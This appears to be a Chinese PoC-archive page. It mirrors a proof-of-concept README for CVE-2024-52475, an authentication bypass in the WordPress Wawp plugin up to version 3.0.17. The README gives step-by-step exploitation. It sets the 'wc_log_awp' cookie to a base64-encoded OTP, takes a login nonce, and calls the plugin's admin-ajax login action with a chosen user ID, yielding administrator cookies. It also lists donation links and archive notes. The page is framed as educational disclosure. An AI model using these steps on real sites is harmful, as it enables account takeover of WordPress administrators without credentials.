关联漏洞
标题:
WordPress plugin Wawp 安全漏洞
(CVE-2024-52475)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Wawp 3.0.18版本之前存在安全漏洞,该漏洞源于使用备用路径或通道漏洞绕过身份验证。
描述
Broken Authentication in Wordpress plugin (Wawp Plugin < 3.0.18)
介绍
## (CVE-2024-52475) WordPress Wawp Plugin <= 3.0.17 is vulnerable to Broken Authentication (Account takeover)
### **Disclaimer!**
The information provided in this document regarding for **CVE-2024-52475** is for learning and educational purposes only. We do not encourage or authorize the use of this information for any detrimental purposes, including but not limited to exploitation, system tampering, or other illegal activities.
We emphasize the importance of ethics in the exploration and understanding of security vulnerabilities. Please remember that use of this information should be done responsibly and in accordance with applicable laws. Any actions taken using this information are the sole responsibility of the user.
By using this material, you agree not to misuse the information provided, and you take full responsibility for any consequences that may arise from the use of such information.
### **Introduction**
After browsing some sources and related code about this CVE, I found some oddities and flaws in the class-login.php file of the Wawp Plugin at version 3.0.17 onwards. The flaw is in lines 252 to 257 where the code decodes the OTP from cookie 'wc_log_awp'. That allows someone irresponsible to set the cookie manually via DevTools or otherwise.
### **Testing**
1. Set cookie 'wc_log_awp' manually from DevTools, with this value 'VFZSSmVrMVVUWGc9' decoded: (123131)
2. Find the login nonce at home/login page
 or 
3. And go to this this url directly
```url
http://wordpress.test/wp-admin/admin-ajax.php?action=awp_login&nonce=LOGIN_NONCE&code=123131&user=USER_ID
```
4. If the response is like this, the exploit is successful
5. Check cookies admin from DevTools, and go to /wp-admin
### Buy me a coffe:
- [saweria.co](https://saweria.co/ubaii)
- [buymeacoffee.com](https://buymeacoffee.com/ubaii)
- [trakteer.id](https://trakteer.id/ubaii)
### Refference:
[https://patchstack.com/database/vulnerability/automation-web-platform/wordpress-wawp-plugin-3-0-18-account-takeover-vulnerability](https://patchstack.com/database/vulnerability/automation-web-platform/wordpress-wawp-plugin-3-0-18-account-takeover-vulnerability)
### Thanks To:
Allah, Muhammad SAW, stealthcopter, Markdown Monster, my family, you?
文件快照
[4.0K] /data/pocs/a2f839b29bf02f8db4ed76f35d12c9be9162acbc
├── [136K] 1.jpg
├── [ 13K] 2.jpg
├── [7.3K] 3.jpg
├── [ 36K] 4.jpg
├── [ 34K] 5.jpg
└── [2.3K] README.md
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。